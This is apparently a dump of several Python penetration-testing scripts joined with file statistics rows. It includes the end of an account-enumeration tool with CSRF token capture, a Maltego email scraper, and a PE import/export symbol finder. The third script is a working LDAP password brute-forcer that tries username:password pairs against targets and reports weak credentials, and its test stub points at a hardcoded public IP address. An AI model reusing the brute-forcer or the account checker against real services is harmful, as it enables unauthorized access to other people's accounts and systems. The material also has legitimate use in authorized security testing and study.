else:
cookie_val = False
# capture CSRF token (using regex from module XML)
if test['requestCSRF']:
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
req_headers = { 'User-Agent' : user_agent }
if cookie_val:
# if a cookie value exists, use the existing response
if opts.debug:
print " [" + color['yellow'] + "-" + color['end'] \
+ "] Using existing response to gather CSRF token"
else:
# get new response to work with
url = test['csrf_url']
req_val = urllib2.Request(url, headers=req_headers)
            response = urllib2.urlopen(req_val)
            resp_body = response.read()
try:
csrf_regex = re.compile(test['csrf_regex'])
match = re.search(csrf_regex, resp_body)
if match:
csrf_val = match.group(1)
else:
csrf_val = False
print " [" + color['red'] + "!" + color['end'] \
+ "] Invalid CSRF regex. Please check parameters"
except:
print " [" + color['red'] + "!" + color['end'] \
+ "] Invalid CSRF regex. Please check parameters"
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
else:
csrf_val = False
return cookie_val, csrf_val
def error_check(data, errormatch):
# checks response data against errormatch regex
try:
regex = re.compile(errormatch)
if regex.search(data):
return True
else:
return False
except:
print " [" + color['red'] + "!" + color['end'] \
+ "] Invalid in error check. Please check parameter"
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
def success_check(data, successmatch):
# checks response data against successmatch regex
try:
regex = re.compile(successmatch)
if regex.search(data):
return True
else:
return False
except:
print " [" + color['red'] + "!" + color['end'] \
+ "] Invalid in success check. Please check parameter"
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
def negative_check(data, negativematch):
# checks response data against negativematch regex
try:
regex = re.compile(negativematch)
if regex.search(data):
return True
else:
return False
except:
print " [" + color['red'] + "!" + color['end'] \
+ "] Invalid in negative check. Please check parameter"
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
def debug_save_response(test, resp, r_info, req):
# save advanced deug responses to ./debug/
# get time to attach to filename
timenow = int(time.time())
# set testname, remove spaces
testname = re.sub(r'[^\w]', '_', test['name']) + "_"
# check debug directory exists, if not create it
if not os.path.exists('./debug/'):
os.makedirs('./debug/')
# filename for html and headers, strip unusable chars from filenames
htmlfile = testname + str(timenow)
htmlfile = './debug/' + re.sub(r'[^\w]', '_', htmlfile) + '.html' # strip unsuitable chars
hdrfile = testname + str(timenow)
hdrfile = './debug/' + re.sub(r'[^\w]', '_', hdrfile) + '.headers' # strip unsuitable chars
# format headers
header_output = []
header_output.append('---------------------\nrequest headers\n---------------------\n')
for key in req.headers:
header_output.append(key + ': ' + req.headers[key])
header_output.append('\n---------------------\nresponse headers\n---------------------\n')
for each in r_info.headers:
header_output.append(each.rstrip())
header_output.append('\n')
# check if file exists, if so add random number to filename
if os.path.isfile(htmlfile):
rand_addition = str(random.randint(0000, 9999)).zfill(4)
htmlfile = htmlfile[:-5] + '_' + rand_addition + '.html'
hdrfile = hdrfile[:-8] + '_' + rand_addition + '.headers'
# open file for writing
f_html = open(htmlfile, 'w')
f_headers = open(hdrfile, 'w')
# write response and close
f_html.write(resp)
f_html.close()
# write headers and close
f_headers.write("\n".join(header_output))
f_headers.close()
print " [" + color['yellow'] + ">" + color['end'] + "] Saved debug output to %s[.html|.header]" % htmlfile[:-5]
def signal_handler(signal, frame):
# handle CTRL + C events
# globally signal threads to end
global sigint
sigint = True # turn on SIGINT
print
if not len(success) == 0:
if opts.summary or (opts.verbose and opts.summary):
print " [" + color['red'] + "!" + color['end'] \
+ "] Outputting successful findings and closing\n"
output_success()
print " [" + color['yellow'] + "-" + color['end'] \
+"] tests stopped after %.2f seconds" % (time.clock() - startTime)
print "\n [" + color['red'] + "!" + color['end'] + "] Ctrl+C detected... exiting\n"
if opts.outputfile and not isinstance(opts.outputfile, str):
# if opts.outputfile is an open file, close it to save output
opts.outputfile.close()
os._exit(1)
def query_user(question, default='no'):
# query user for Y/N response
valid = {"yes":True, "y":True, "no":False, "n":False}
if default.lower() == 'yes':
prompt = " [ " + color['yellow'] + "Y" + color['end'] + "/n ] :"
else:
prompt = " [ y/" + color['yellow'] + "N" + color['end'] + " ] :"
while True:
print question + prompt,
try:
choice = raw_input().lower()
except:
print "\n\n [" + color['red'] + "!" + color['end'] \
+ "] Ctrl+C detected... exiting\n"
sys.exit(0)
if choice == '':
if default.lower() == 'yes':
return valid["yes"]
else:
return valid["no"]
elif choice in valid:
return valid[choice]
else:
print "\t[" + color['red'] + "!" + color['end'] \
+ "] Please respond with 'yes' or 'no'\n"
def setup():
# setup command line options
global opts
parser = OptionParser(version="%prog version ::: " + __version__, epilog="\n")
# account options grouping
group = OptionGroup(parser, "Account Options ")
group.add_option(
"-a", "--accountfile",
dest="accountfile",
default="./accountfile.txt",
help="Location of the accounts FILE (1 per line)",
metavar="FILE"
)
group.add_option(
"-u", "--account",
dest="account",
default=[],
action="append",
help="Account(s) to check (comma seperated, no spaces)",
metavar="STRING"
)
parser.add_option_group(group)
# module options grouping
group = OptionGroup(parser, "Module Options ")
group.add_option(
"-l", "--list",
action="store_true",
dest="listmodules",
default=False,
help="List module names and categories",
)
group.add_option(
"-m", "--moduledir",
dest="moduledir",
default="./modules/",
help="Location of the modules directory",
metavar="DIR"
)
group.add_option(
"-s", "--single",
dest="single",
default="",
help="Restrict to specific module name (XML NAME or filename)",
metavar="MODULE"
)
group.add_option(
"-c", "--category",
dest="category",
default=[],
action="append",
help="Restrict modules based on category (comma seperated, no spaces)"
)
parser.add_option_group(group)
# timing options grouping
group = OptionGroup(parser, "Timing Options ")
group.add_option(
"-t", "--threads",
dest="threads",
default=0,
help="Enable threading. Specify max # of threads",
metavar="INT",
type="int"
)
group.add_option(
"-w", "--wait",
dest="wait",
default=False,
help="Throttle tests (e.g. -w 0.5 for 0.5 second delay)",
type="float",
metavar="SECS"
)
group.add_option(
"--retrytime",
dest="retrytime",
default="30",
help="Wait and retry on errormatch (seconds)",
type="int",
metavar="SECS"
)
group.add_option(
"--retries",
dest="retries",
default="1",
help="Number of retries, doubling wait time each retry",
type="int"
)
parser.add_option_group(group)
# output options grouping
group = OptionGroup(parser, "Output Options ")
group.add_option(
"--summary",
action="store_true",
dest="summary",
default=False,
help="Show detailed summary before closing",
)
group.add_option(
"-o", "--output",
dest="outputfile",
default=False,
help="Output results to a file as well as screen",
metavar="FILE"
)
parser.add_option_group(group)
# debug options grouping
group = OptionGroup(parser, "Debug Options")
group.add_option(
"-v", "--verbose",
action="count",
dest="verbose",
help="Print verbose messages to stdout (-vv for very verbose)"
)
group.add_option(
"-d", "--debug",
action="store_true",
dest="debugoutput",
default=False,
help="Store response and headers in ./debug/"
)
group.add_option(
"-?",
action="store_true",
dest="question",
default=False,
help=SUPPRESS_HELP
) # hidden -? handling
parser.add_option_group(group)
(opts, args) = parser.parse_args()
# the following section reworks options as required
# set retries to 1 if retrytime set and not set already
if not opts.retrytime == 30 and \
opts.retries == 0:
# user set retrytime but forgot to set retries to at least 1
opts.retries = 1
# split multiple account names into flat list
if opts.account:
acc_split = []
for a in opts.account:
acc_split.append(a.split(','))
opts.account = sum(acc_split, [])
# remove blanks and invalid entries from accounts
opts.account = filter(None, opts.account)
# split multiple categories into flat list
if opts.category:
cat_split = []
for c in opts.category:
cat_split.append(c.split(','))
opts.category = sum(cat_split, [])
else:
# default to all categories
opts.category = ['all']
# handle help output
if opts.question: # print help on -? also
parser.print_help()
sys.exit(0)
# set verbosity level (-v verbose, -v -v verbose and debug)
if not opts.verbose:
opts.verbose = False
opts.debug = False
elif opts.verbose == 1:
opts.verbose = True
opts.debug = False
elif opts.verbose == 2:
opts.verbose = True
opts.debug = True
elif opts.verbose == 3:
opts.verbose = True
opts.debug = True
# enabled saving of header and response data to ./debug/
opts.debugoutput = True
else:
opts.verbose = True
opts.debug = True
# set ansi colors for supported platforms (colorama support for Windows)
if sys.platform.startswith("win"):
try:
import colorama
colorama.init()
color['red'] = colorama.Fore.RED + colorama.Style.BRIGHT
color['green'] = colorama.Fore.GREEN + colorama.Style.BRIGHT
color['yellow'] = colorama.Fore.YELLOW + colorama.Style.BRIGHT
color['end'] = colorama.Fore.RESET + colorama.Style.RESET_ALL
except:
# disable colors on systems without colorama installed
print "\n\t[!] Colorama Python module not found, color support disabled"
color['red'] = ""
color['green'] = ""
color['yellow'] = ""
color['end'] = ""
else:
# set colors for non-Windows systems
color['red'] = "\033[1;31m"
color['green'] = "\033[1;32m"
color['yellow'] = "\033[1;33m"
color['end'] = "\033[0m"
# error on wait AND threads
if opts.wait and opts.threads > 0:
parser.print_help()
parser.exit(0, "\n\t[" + color['red'] + "!" + color['end'] \
+"] Please don't set throttling (wait) AND threading!\n")
# clear category if single module specified
if opts.single:
opts.category = "single"
# clear accountfile if account specified at command line
if opts.account:
opts.accountfile = "none"
# display selected options for the user
display_options()
# default user_input for cases where none is required
user_input = "none"
# attempt to handle situations where no module or account file is specified
# skip section if module output is selected
if (opts.moduledir == './modules/' and opts.accountfile == './accountfile.txt') \
and not opts.listmodules and not opts.account and \
"all" in (cat.lower() for cat in opts.category):
# accountdir and moduledir are default single/specific account mode not enabled
print "\t[ ] No command-line options specified"
# prompt user as this could be dangerous
user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \
+"] Test accounts in accountfile.txt against ALL modules? (dangerous)", 'no')
# vary prompts cased on selected options
# case: account(s) specified but modules not set
elif opts.account and opts.moduledir == './modules/' and \
not opts.single and "all" in (cat.lower() for cat in opts.category):
user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \
+"] Test provided account(s) against ALL modules?", 'yes')
# case: module set but accountfile left at default
elif opts.single and opts.accountfile == './accountfile.txt':
user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \
+"] Test usernames in accountfile.txt against the selected module?", 'yes')
# case: category set but accountfile left at default
elif opts.category and opts.accountfile == './accountfile.txt' \
and not opts.listmodules:
user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \
+"] Test accounts in accountfile.txt against selected category?", 'yes')
# handle user_input
if user_input:
# continue using defaults
if not user_input == "none":
print "\t[ ] Continuing...."
else:
print
parser.print_help()
parser.exit(0, "\t[" + color['red'] + "!" + color['end'] \
+"] Please specify arguments\n")
# check if outputfile exists already and prompt to overwrite
if opts.outputfile:
if os.path.exists(opts.outputfile):
# query user to overwrite existing outputfile
user_input = query_user("\t[" + color['yellow'] + "?" + color['end'] \
+"] Overwrite existing outputfile?", 'no')
if user_input:
print "\t[ ] Overwriting output file : %s\n" % opts.outputfile
else:
sys.exit("\n\t[" + color['red'] + "!" + color['end'] \
+"] Please specify new output file\n")
# open output file
try:
opts.outputfile = open(opts.outputfile, "w")
except:
print " [" + color['red'] + "!" + color['end'] \
+ "] Unable to open output file for writing"
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
def display_options():
# print out the options being used
print "\n ------------------------------------------------------------------------------"
# display accountfile if accounts not specified at commandline
if not opts.account:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Account File :::".ljust(30), \
str(opts.accountfile).ljust(40)
else:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Account(s) :::".ljust(30), \
", ".join(opts.account).ljust(40)
# print module directory
print "\t[" + color['yellow'] + "-" + color['end'] +"] Module Directory :::".ljust(30), \
str(opts.moduledir).ljust(40)
# print categories if not single
if not opts.single:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Categories :::".ljust(30), \
", ".join(opts.category).ljust(40)
else:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Single Module :::".ljust(30), \
str(opts.single).ljust(40)
# display debug level
if opts.debugoutput:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Verbose :::".ljust(30), \
"Debug output to ./debug/".ljust(40)
elif opts.debug:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Verbose :::".ljust(30), \
"Very Verbose".ljust(40)
else:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Verbose :::".ljust(30), \
"Verbose".ljust(40)
# create outputfile and display filename
if opts.outputfile:
# get filename based on current path
file = os.path.realpath(opts.outputfile).replace(os.getcwd(), "")
if file.startswith("\\") or file.startswith("/"):
# strip leading \ from file display
file = file[1:]
print "\t[" + color['yellow'] + "-" + color['end'] +"] Output :::".ljust(30), \
str(file).ljust(40)
# display wait, threads and retries if specified
if opts.wait:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Throttling :::".ljust(30), \
str(opts.wait) + " seconds".ljust(40)
if opts.threads:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Threads :::".ljust(30), \
str(opts.threads) + " threads".ljust(40)
if opts.retries:
print "\t[" + color['yellow'] + "-" + color['end'] +"] Retries (delay) :::".ljust(30), \
str(opts.retries) + " (" + str(opts.retrytime) + " secs)".ljust(40)
print " ------------------------------------------------------------------------------\n"
class NullHTTPErrorProcessor(urllib2.HTTPErrorProcessor):
# return contents without throwing errors (not everything in life is a 200 OK)
def http_response(self, request, response):
return response
def https_response(self, request, response):
return response
def main():
logo()
setup()
load_modules()
load_accounts()
testcases = create_testcases()
request_handler(testcases)
# print success matches at the end
print "\n [" + color['yellow'] + "-" + color['end'] \
+"] tests completed in %.2f seconds" \
% (time.clock() - startTime)
if len(success) > 0:
print " [" + color['yellow'] + "+" + color['end'] \
+"] %d matches found" \
% len(success)
output_success()
else:
sys.exit("\n\t[" + color['red'] + "!" + color['end'] \
+ "] No matches found. Exiting!")
signal.signal(signal.SIGINT, signal_handler)
main()
| 39.999301 | 115 | 0.516323 |
Python-Penetration-Testing-for-Developers | import urllib2
import re
import sys
tarurl = sys.argv[1]
url = urllib2.urlopen(tarurl).read()
regex = re.compile(("([a-z0-9!#$%&'*+\/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+\/=?^_`"
"{|}~-]+)*(@|\sat\s)(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(\.|"
"\sdot\s))+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)"))
print"<MaltegoMessage>"
print"<MaltegoTransformResponseMessage>"
print" <Entities>"
emails = re.findall(regex, url)
for email in emails:
print" <Entity Type=\"maltego.EmailAddress\">"
print" <Value>"+str(email[0])+"</Value>"
print" </Entity>"
print" </Entities>"
print"</MaltegoTransformResponseMessage>"
print"</MaltegoMessage>" | 30.428571 | 79 | 0.561457 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import ldap
class ldap_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/ldapd.conf")
def ldap_connect(self,ip,username,password,port):
creak=0
try:
ldappath='ldap://'+ip+':'+port+'/'
l = ldap.initialize(ldappath)
            # simple_bind() is asynchronous and only returns a message id, so use
            # the synchronous simple_bind_s(); a clean return means the bind succeeded
            l.simple_bind_s(username,password)
            creak=1
except Exception,e:
if e[0]['desc']=="Can't contact LDAP server":
creak=2
pass
return creak
def ldap_creak(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.ldap_connect(ip,username,password,port)
if flag==2:
self.lock.acquire()
printGreen("%s ldap at %s can't connect\r\n" %(ip,port))
self.lock.release()
break
if flag==1:
self.lock.acquire()
printGreen("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
else:
self.lock.acquire()
print "%s ldap service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ldap']):
printPink("crack ldap now...")
print "[*] start ldap %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ldap']:
pool.apply_async(func=self.ldap_creak,args=(str(ip).split(':')[0],str(ip).split(':')[1]))
pool.close()
pool.join()
print "[*] stop ldap serice %s" % time.ctime()
print "[*] crack ldap done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ldap': ['124.172.223.236:389']}
pinglist=['192.168.1.1']
test=ldap_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
| 32.045977 | 126 | 0.492693 |
cybersecurity-penetration-testing | #!/usr/bin/python3
#
# A script that enumerates Imports and Exports of PE files and prints them according to search criteria.
#
# Lets the user find imported/exported symbols matching criteria such as:
# - symbol being import or export
# - symbol matching name
# - symbol NOT matching name
# - module matching name
# - module NOT matching name
#
# Mariusz Banach / mgeeky, '21
# <mb [at] binary-offensive.com>
#
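#
# Example invocations (illustrative only -- the script name, paths and patterns
# below are placeholders, not part of the original tool):
#   python3 findSymbols.py -r -E dll -i -s CreateRemoteThread C:\Windows\System32
#   python3 findSymbols.py -e -m kernel32 -f json -o results.json C:\target\dir
#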
import os
import re
import sys
import glob
import json
import time
import signal
import pprint
import pefile
import tabulate
import platform
import textwrap
import argparse
import tempfile
import subprocess
import multiprocessing
from datetime import datetime
from itertools import product
from multiprocessing import Pool, Queue, Process, freeze_support, Manager, Lock
DEFAULT_COLUMN_SORTED = 'filename'
headers = [
'filename',
'symbol type',
'module',
'symbol',
'file size',
'path',
]
symbol_idx = headers.index('symbol')
class Logger:
colors_map = {
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
'grey': 38,
}
colors_dict = {
'error': colors_map['red'],
'trace': colors_map['magenta'],
'info ': colors_map['green'],
'debug': colors_map['grey'],
'other': colors_map['grey'],
}
@staticmethod
def with_color(c, s):
return "\x1b[%dm%s\x1b[0m" % (c, s)
@staticmethod
def end_color(s):
return "%s\x1b[0m" % (s)
@staticmethod
def colored(args, txt, col):
if not args.color:
return txt
return Logger.with_color(Logger.colors_map[col], txt)
def out(x):
sys.stderr.write(x + '\n')
def verbose(args, x):
if args.verbose:
sys.stderr.write('[verbose] ' + x + '\n')
def collectImports(args, mod):
imports = []
if not hasattr(mod, 'DIRECTORY_ENTRY_IMPORT') or not mod.DIRECTORY_ENTRY_IMPORT:
return imports
try:
for entry in mod.DIRECTORY_ENTRY_IMPORT:
module = entry.dll.decode('utf-8').lower()
for func in entry.imports:
if not func.name:
continue
func = func.name.decode()
imports.append(('import', module, func))
except Exception as e:
verbose(args, f'Exception occured while collecting PE imports: {e}')
return imports
def collectExports(args, filename, mod):
exports = []
if not hasattr(mod, 'DIRECTORY_ENTRY_EXPORT') or not mod.DIRECTORY_ENTRY_EXPORT:
return exports
try:
for entry in mod.DIRECTORY_ENTRY_EXPORT.symbols:
if not entry.name:
continue
func = entry.name.decode()
exports.append(('export', os.path.basename(filename), func))
except Exception as e:
verbose(args, f'Exception occured while collecting PE exports: {e}')
return exports
def verifyCriterias(args, regexes, infos, uniqueSymbols):
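    # Evaluation order of the filters below (documenting the existing logic):
    # --unique / --imports / --exports are applied first, then any not-name
    # regex excludes the symbol, then any not-module regex excludes it,
    # then a module regex (if supplied) must match, and finally a name
    # regex (if supplied) must match for the symbol to be reported.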
if args.unique and infos['symbol'] in uniqueSymbols:
verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} because it is not unique in our results.')
return False
if args.imports and infos['symbol type'] != 'import':
verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} because it was not an import.')
return False
if args.exports and infos['symbol type'] != 'export':
verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} because it was not an export.')
return False
regexesVerified = sum([len(v) for k, v in regexes.items()])
regexes_name = len(regexes['name'])
regexes_not_name = len(regexes['not-name'])
regexes_module = len(regexes['module'])
regexes_not_module = len(regexes['not-module'])
for name, rex in regexes['not-name']:
match = rex.search(infos['symbol'])
if match:
matched = match.group(1)
infos['symbol'] = infos['symbol'].replace(matched, Logger.colored(args, matched, 'red'))
verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} as it DID satisfy not-name ({name}) regex.')
return False
if regexes_not_module+regexes_module+regexes_name == 0:
        verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criteria.')
return True
for name, rex in regexes['not-module']:
match = rex.search(infos['module'])
if match:
matched = match.group(1)
infos['module'] = infos['module'].replace(matched, Logger.colored(args, matched, 'red'))
verbose(args, f'(-) Skipping symbol\'s module {infos["module"]}.{infos["symbol"]} as it DID satisfy not-module ({name}) regex.')
return False
if regexes_module+regexes_name == 0:
        verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criteria.')
return True
satisifed = False
carryOn = False
if len(regexes['module']) > 0:
for name, rex in regexes['module']:
match = rex.search(infos['module'])
if match:
matched = match.group(1)
infos['module'] = infos['module'].replace(matched, Logger.colored(args, matched, 'green'))
verbose(args, f'(+) Symbol\'s module {infos["module"]}.{infos["symbol"]} satisfied module ({name}) regex.')
carryOn = True
break
else:
carryOn = True
if regexes_name == 0:
            verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criteria.')
return True
if carryOn:
for name, rex in regexes['name']:
match = rex.search(infos['symbol'])
if match:
matched = match.group(1)
infos['symbol'] = infos['symbol'].replace(matched, Logger.colored(args, matched, 'green'))
verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied name ({name}) regex.')
satisifed = True
break
    # also accept when a module regex matched (carryOn) but no name regex was supplied
    if regexesVerified == 0 or satisifed or (carryOn and regexes_name == 0):
        verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criteria.')
return True
else:
        verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} as it DID NOT satisfy all criteria.')
return False
def processFileWorker(arguments):
    # keep the worker's return value in a differently named variable so it does
    # not shadow the module-level out() helper used in the except block below
    result = None
    try:
        (args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed) = arguments
        result = processFile(args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed)
    except (KeyboardInterrupt, SystemExit) as e:
        out(str(e))
    return result
def processFile(args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed):
verbose(args, 'Processing file: ' + path)
mod = None
try:
mod = pefile.PE(path, fast_load = True)
mod.parse_data_directories()
    except:
        # pefile.PE() may have failed before mod was assigned
        if mod:
            mod.close()
        return
imports = collectImports(args, mod)
exports = collectExports(args, os.path.basename(path), mod)
symbols = imports + exports
mod.close()
once = False
for (symbolType, symbolModule, symbolName) in symbols:
infos = {
'path' : path,
'filename' : os.path.basename(path),
'file size' : os.path.getsize(path),
'symbol type' : symbolType,
'symbol' : symbolName,
'module' : symbolModule,
}
if not once:
assert len(infos.keys()) == len(headers), "headers and infos.keys() mismatch"
assert list(infos.keys()).sort() == list(headers).sort(), "headers and infos.keys() mismatch while sorted"
once = True
if args.format == 'text':
appendRow = verifyCriterias(args, regexes, infos, uniqueSymbols)
if args.color:
if infos['symbol type'] == 'import':
infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'cyan')
else:
infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'yellow')
if appendRow:
row = []
MaxWidth = 40
for h in headers:
obj = None
if type(infos[h]) == set or type(infos[h]) == list or type(infos[h]) == tuple:
obj = ', '.join(infos[h])
else:
obj = infos[h]
if type(obj) == str and len(obj) > MaxWidth:
if h == 'path':
obj = '\n'.join(textwrap.wrap(obj, width = 2 * MaxWidth))
else:
obj = '\n'.join(textwrap.wrap(obj, width = MaxWidth))
row.append(obj)
results.append(row)
uniqueSymbols.append(symbolName)
#verbose(args, 'Processed results:\n' + pprint.pformat(infos))
else:
                verbose(args, f'Symbol {symbolModule}.{symbolName} did not meet the filter criteria.')
elif args.format == 'json':
appendRow = verifyCriterias(args, regexes, infos, uniqueSymbols)
if args.color:
if infos['symbol type'] == 'import':
infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'cyan')
else:
infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'yellow')
if appendRow:
results.append(infos)
uniqueSymbols.append(symbolName)
#verbose(args, 'Processed results:\n' + pprint.pformat(infos))
else:
                verbose(args, f'Symbol {symbolModule}.{symbolName} did not meet the filter criteria.')
filesProcessed.value += 1
symbolsProcessed.value += len(symbols)
def trap_handler(signum, frame):
out('[-] CTRL-C pressed. Wait a minute until all processes wrap up or manually terminate python\'s child processes tree.')
def init_worker():
signal.signal(signal.SIGINT, trap_handler)
def processDir(args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed):
filePaths = []
out('[.] Building list of files to process...')
for file in glob.glob(os.path.join(path, '**'), recursive=args.recurse):
try:
if len(args.extension) > 0:
skip = True
for ext in args.extension:
if file.lower().endswith(f'.{ext}'):
skip = False
break
if skip:
verbose(args, f'[-] Skipping file as it not matched extension ({ext}): {file}')
continue
if os.path.isfile(file):
looks_like_pe = False
with open(file, 'rb') as f:
mz = f.read(2)
if len(mz) == 2:
looks_like_pe = (mz[0] == ord('M') and mz[1] == ord('Z')) or (mz[1] == ord('M') and mz[0] == ord('Z'))
if looks_like_pe: filePaths.append(file)
except Exception as e:
verbose(args, f'[-] Could not open file: ({file}). Exception: {e}')
continue
cpu_count = multiprocessing.cpu_count()
pool = Pool(cpu_count, initializer=init_worker)
try:
arguments = [[args, regexes, _path, results, uniqueSymbols, filesProcessed, symbolsProcessed] for _path in filePaths]
out(f'[.] Scanning {Logger.colored(args, len(filePaths), "yellow")} files...')
if len(filePaths) > 5000:
out(f'[.] Be patient that\'s gonna take a long while...')
res = pool.map(processFileWorker, arguments)
except KeyboardInterrupt:
out(f'[-] User interrupted the scan after {Logger.colored(args, filesProcessed.value, "red")} files.')
pool.terminate()
pool.join()
def opts(argv):
params = argparse.ArgumentParser(
prog = argv[0],
usage='%(prog)s [options] <path>'
)
params.add_argument('path', help = 'Path to a PE file or directory.')
params.add_argument('-r', '--recurse', action='store_true', help='If <path> is a directory, perform recursive scan.')
params.add_argument('-v', '--verbose', action='store_true', help='Verbose mode.')
params.add_argument('-f', '--format', choices=['text', 'json'], default='text', help='Output format. Text or JSON.')
params.add_argument('-E', '--extension', default=[], action='append', help='Extensions of files to scan. By default will scan all files. Can be repeated: -E exe -E dll')
params.add_argument('-o', '--output', metavar='PATH', help='Write output to file.')
params.add_argument('-C', '--color', default=False, action='store_true', help='Add colors to text output. May uglify table text output')
sorting = params.add_argument_group('Output sorting')
sorting.add_argument('-u', '--unique', action='store_true', help = 'Return unique symbols only. The first symbol with a name that occurs in results, will be returned.')
    sorting.add_argument('-d', '--descending', action='store_true', help = 'Sort in descending order instead of the default ascending order.')
sorting.add_argument('-c', '--column', default=DEFAULT_COLUMN_SORTED, choices=headers, metavar='COLUMN', help = 'Sort by this column name. Default: filename. Available columns: "' + '", "'.join(headers) + '"')
    sorting.add_argument('-n', '--first', type=int, default=0, metavar='NUM', help='Show only the first N results, as specified in this parameter. By default all candidates are shown.')
filters = params.add_argument_group('Output filtering')
filters.add_argument('-i', '--imports', action='store_true', help = 'Filter only Imports.')
filters.add_argument('-e', '--exports', action='store_true', help = 'Filter only Exports.')
filters.add_argument('-s', '--name', action='append', default=[], help = 'Search for symbols with name matching this regular expression. Can be repeated, case insensitive')
filters.add_argument('-S', '--not-name', action='append', default=[], help = 'Search for symbols with name NOT matching this regular expression.')
filters.add_argument('-m', '--module', action='append', default=[], help = 'Search for symbols exported in/imported from this module matching regular expression.')
filters.add_argument('-M', '--not-module', action='append', default=[], help = 'Search for symbols NOT exported in/NOT imported from this module matching regular expression.')
args = params.parse_args()
if args.imports and args.exports:
out('[!] --imports and --exports are mutually exclusive. Pick only one of them!')
sys.exit(1)
accomodate_rex = lambda x: f'({x})'
regexes = {
'name': [],
'not-name': [],
'module': [],
'not-module': []
}
for name in args.name:
regexes['name'].append((name, re.compile(accomodate_rex(name), re.I)))
for not_name in args.not_name:
regexes['not-name'].append((not_name, re.compile(accomodate_rex(not_name), re.I)))
for module in args.module:
regexes['module'].append((module, re.compile(accomodate_rex(module), re.I)))
for not_module in args.not_module:
regexes['not-module'].append((not_module, re.compile(accomodate_rex(not_module), re.I)))
for i in range(len(args.extension)):
args.extension[i] = args.extension[i].lower()
if args.extension[i].startswith('.'):
args.extension[i] = args.extension[i][1:]
return args, regexes
def main():
results = Manager().list()
uniqueSymbols = Manager().list()
filesProcessed = Manager().Value('i', 0)
symbolsProcessed = Manager().Value('i', 0)
out('''
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com>
''')
args, regexes = opts(sys.argv)
is_wow64 = (platform.architecture()[0] == '32bit' and 'ProgramFiles(x86)' in os.environ)
start_time = datetime.now()
try:
if '\\system32\\' in args.path.lower() and is_wow64:
verbose(args, 'Redirecting input path from System32 to SysNative as we run from 32bit Python.')
args.path = args.path.lower().replace('\\system32\\', '\\SysNative\\')
if os.path.isdir(args.path):
processDir(args, regexes, args.path, results, uniqueSymbols, filesProcessed, symbolsProcessed)
else:
if not os.path.isfile(args.path):
out(f'[!] Input file does not exist! Path: {args.path}')
sys.exit(1)
processFile(args, regexes, args.path, results, uniqueSymbols, filesProcessed, symbolsProcessed)
except KeyboardInterrupt:
out(f'[-] User interrupted the scan.')
time_elapsed = datetime.now() - start_time
if args.format == 'json':
resultsList = list(results)
dumped = str(json.dumps(resultsList, indent=4))
if args.output:
with open(args.output, 'w') as f:
f.write(dumped)
else:
print('\n' + dumped)
else:
resultsList = list(results)
if len(resultsList) > 0:
idx = headers.index(args.column)
resultsList.sort(key = lambda x: x[idx], reverse = args.descending)
headers[idx] = '▼ ' + headers[idx] if args.descending else '▲ ' + headers[idx]
if args.first > 0:
